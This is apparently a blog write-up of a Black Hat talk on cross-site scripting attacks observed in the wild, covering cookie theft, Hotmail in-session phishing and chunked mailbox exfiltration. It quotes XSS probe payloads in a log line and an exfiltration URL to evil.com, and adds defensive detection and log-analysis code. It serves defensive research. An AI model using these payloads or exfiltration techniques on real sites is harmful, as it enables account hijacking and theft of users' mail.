For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. This was a joint presentation by Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.
This is part 1 of a 2 part blog post. In this installment, we will discuss example XSS attacks captured in the wild and also some statistics. In part 2, we will discuss XSS Defense Techniques.
XSS: Vulnerability Prevalence
OWASP Top 10 2013
The latest OWASP Top 10 Web Applications Risk Project lists the following risk graphic for XSS:
As you can see from this graphic, the PREVALENCE of XSS across all applications tested is VERY WIDESPREAD.
Trustwave Global Security Report
In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of the top vulnerabilities identified in the last year during their engagements:
Again, XSS is listed as the top vulnerability identified.
XSS: Attack Likelihood
The previous section provided metrics to support the theory that we already know - XSS vulnerabilities are rampant. What we wanted to focus on for our research was this - HOW are XSS vulnerabilities being exploited in the wild?
XSS Attack Data Sources
In order to find real-world attack data, we analyzed a variety of resources:
- Webserver/proxy logs
- Web application firewall logs
- URL shortening services
- Chatrooms, IRC traffic
- Comments on pages
- URL reputation services
All of this data together yielded approximately:
- 100s TB of raw data
- 10s TB of URLs
XSS Attack Data Analysis
So, how did we analyze this data for XSS attacks? Greg created a toolset called detectXSSlib:
- General purpose library written in C
- Based on a subset of OWASP CRS rules (IE XSS Filters)
- Optimized for performance
- Rules selected on the basis of empirical data
- Command line tool provided (xssscan)
- Easy to integrate with other components
- nginx module PoC provided
The xssscan command line tool can be used like this:
# ./xssscan
xssscan ver 1.0 (c) 2013 Greg Wroblewski
Command line tool for detection of XSS attacks in URLs.
Based on ModSecurity rules from OWASP CRS.
Optimized for performance and large scale data mining.

Usage:
xssscan [-t] [-r] [-x] <URL>
xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS>

Options:
-a - in output replace host names with www.example.com
-d - deduplicate URLs by same host name
-r - show rule number for detected XSS (for statistics or debugging)
-t - show tokens of parsed URL (useful for debugging only)
-x - list only URLs where XSS was not detected (default: was detected)

# ./xssscan -f /var/log/apache2/access.log
172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
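As an added illustration of the approach xssscan takes (example code written for this post, not Greg's detectXSSlib), the Python below applies a few hypothetical, simplified CRS-style patterns to the request path and the Referer of Apache combined-format log lines after percent-decoding them, and reports which rule fired on which field, much like the -r option. The rule regexes and the second log line are assumptions; the first log line is the one shown above.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical, simplified CRS-style XSS patterns, labelled so hits can be
# tallied per rule (the idea behind xssscan's -r option). Not the CRS regexes.
XSS_RULES = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("img-onerror", re.compile(r"<\s*img\b[^>]*\bonerror\b", re.I)),
]

# Apache "combined" log format; the request path and the Referer are scanned,
# since both are attacker-controlled and both carry payloads in the sample line.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: the first line is the post's own access.log example
# (spaces restored), the second is a benign request added for contrast.
SAMPLE_LOG = [
    '172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3E'
    'prompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131'
    '/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 '
    '(Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"',
    '10.0.0.5 - - [24/Jul/2013:10:41:02 -0400] "GET /wordpress/?s=season+tickets '
    'HTTP/1.1" 200 1800 "-" "curl/7.30.0"',
]

def decode(value, rounds=2):
    """Percent-decode up to `rounds` times so double encoding cannot hide a payload."""
    for _ in range(rounds):
        value, prev = unquote_plus(value), value
        if value == prev:
            break
    return value

def scan_url(url):
    """Return the names of every rule that fires on the decoded URL."""
    return [name for name, rx in XSS_RULES if rx.search(decode(url))]

def scan_log_line(line):
    """Parse one combined-format line; None if it does not parse, else hits per field."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {f: r for f in ("path", "referer") if (r := scan_url(m.group(f)))}
```

The event-handler pattern is deliberately loose and will produce some false positives on ordinary parameter names, which is why xssscan selects its rules empirically.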
Sanitized Example Attack Data
Sanitized XSS attack data is found here in Greg's GitHub Repo. Here is a small snippet of real-world attack data:
XSS Attack Examples: Proof-of-Concept Testing
Many XSS attacks are simple probes that test whether output encoding defenses are missing, for example:
These tests fall into the following categories:
- Scanning tools
- Going after bug bounty
- Internal testing
XSS Attack Examples: Defacements
Website defacements were another popular use of XSS attacks. Here is an example attack payload:
This attack resulted in a defacement similar to the following screenshot:
XSS Attack Examples: Cookie Stealing
This is the first XSS attack category that directly negatively impacts web application users. Here is an example attack payload:
In line #1, the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response, so that JS code executes. This code instructs the browser to download the wwgw8k5srago.js file. That file contains the code in line #2, which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. If this attack succeeds, the attacker can quickly use the application's SessionID cookie value to log into the application as the victim user.
XSS Attack Examples: In-Session Phishing
***This example uses an XSS vulnerability in Hotmail that has since been fixed.***
If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. Take a look at the example exploit code:
In this instance, if I were logged into Hotmail and received the Phishing email, the JS code would trigger the onerror event handler and issue a jQuery call to the attacker's site, which would present me with the following fake login page:
If the victim falls for this attack, their credentials are sent to the attacker's site. We have seen at least 10 different instances of this type of attack, usually launched against e-mail providers and financial institutions, very often carefully prepared with localized login screens, well-concealed password delivery servers, etc.
XSS Attack Examples: Data Exfiltration
With a successful attack, the script runs in the browser within the victim's current session. The script could hijack and upload to the attacker the entire on-line content accessible from that session: the list of contacts, e-mails, attachments, calendar, files, etc. After a successful upload, the script redirects to a phishing page to get the victim's credentials (the address bar does not change!).
In one case of this attack, the script we have seen had 10s of kB of code, and even included interesting left-over comments. How nice.
The script was able to enumerate through multiple pages of e-mail boxes, extract e-mail data, including attachments, and also steal the contact list. The script was able to:
- Enumerate through the last 60 pages' worth of e-mail
- Extract the From, Subject, and Body of each e-mail by using the same calls as would be triggered if the user were to view the e-mails
- Inject new script elements with the source set to the URL containing the next chunk of the data read from the file
- Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg=<subject+from>^^<segmentindex>^^<next segment of message body>
- Fetch content from inbox/sent/drafts
- Clean up: mark messages that were not originally read as unread
The upload process was also not trivial, leveraging data chunking.
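As an added, defender-side example (not code from this post or from the attack script it describes), the Python below shows how an incident responder could reconstruct from proxy logs what such a chunked upload actually carried: it parses URLs in the shape quoted above, orders the segments of each message by index and reports any chunks missing from the logs. The sample URLs and the addresses in them are constructed; evil.com is the post's own placeholder host.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed proxy-log URLs following the shape quoted in the post:
#   .../hotmail_xss.php?u=<email>&msg=<subject+from>^^<index>^^<body segment>
# Addresses and text are made up; evil.com is the post's own placeholder host.
SAMPLE_URLS = [
    "http://evil.com/hotmail_xss.php?u=victim%40example.com"
    "&msg=Invoice%20from%20alice%5E%5E1%5E%5EPlease%20find%20",
    "http://evil.com/hotmail_xss.php?u=victim%40example.com"
    "&msg=Invoice%20from%20alice%5E%5E0%5E%5EHi%2C%20",
    "http://evil.com/hotmail_xss.php?u=victim%40example.com"
    "&msg=Invoice%20from%20alice%5E%5E3%5E%5Eattached.",
    "http://evil.com/hotmail_xss.php?u=victim%40example.com"
    "&msg=Lunch%20from%20bob%5E%5E0%5E%5ESee%20you%20at%20noon",
    "http://cdn.example.net/jquery.js",  # unrelated traffic, must be ignored
]

def parse_exfil_url(url, path_suffix="/hotmail_xss.php"):
    """Split one exfil URL into (user, message, index, segment), else None."""
    parts = urlsplit(url)
    if not parts.path.endswith(path_suffix):
        return None
    qs = parse_qs(parts.query)  # percent-decodes, so "^^" is literal from here on
    if "u" not in qs or "msg" not in qs:
        return None
    fields = qs["msg"][0].split("^^", 2)
    if len(fields) != 3 or not fields[1].isdigit():
        return None
    return qs["u"][0], fields[0], int(fields[1]), fields[2]

def reassemble(urls):
    """Rebuild each exfiltrated message from its segments and flag index gaps."""
    segments = defaultdict(dict)
    for url in urls:
        rec = parse_exfil_url(url)
        if rec:
            user, message, index, seg = rec
            segments[(user, message)][index] = seg
    report = {}
    for key, segs in segments.items():
        missing = [i for i in range(max(segs) + 1) if i not in segs]
        report[key] = {"segments": len(segs), "missing": missing,
                       "body": "".join(segs[i] for i in sorted(segs))}
    return report
```

A missing index (here segment 2 of the first message) usually means the log source is incomplete rather than that the upload failed, so the gap list bounds what can be confirmed as exfiltrated.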
XSS Attack Statistics
# of Successful XSS Attacks per TLD
We have seen at least one sample of a working attack for almost every single TLD out there.
Successful XSS Attacks Over Time
The intensity of attacks remained at a constant level over the time we were able to monitor them consistently.
Prevalence of XSS Attacks (based on Alexa Top N list)
Well over 6% of the top 1,000 websites had a successful XSS attack.
Part 1 Conclusion
As we have outlined in Part 1 of this blog post, XSS attacks are real. They range in severity and impact depending on what your business model is and who your customers are; however, outcomes such as account hijacking and data exfiltration are serious issues.
How do we protect against XSS attacks? Stay tuned for Part 2 where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.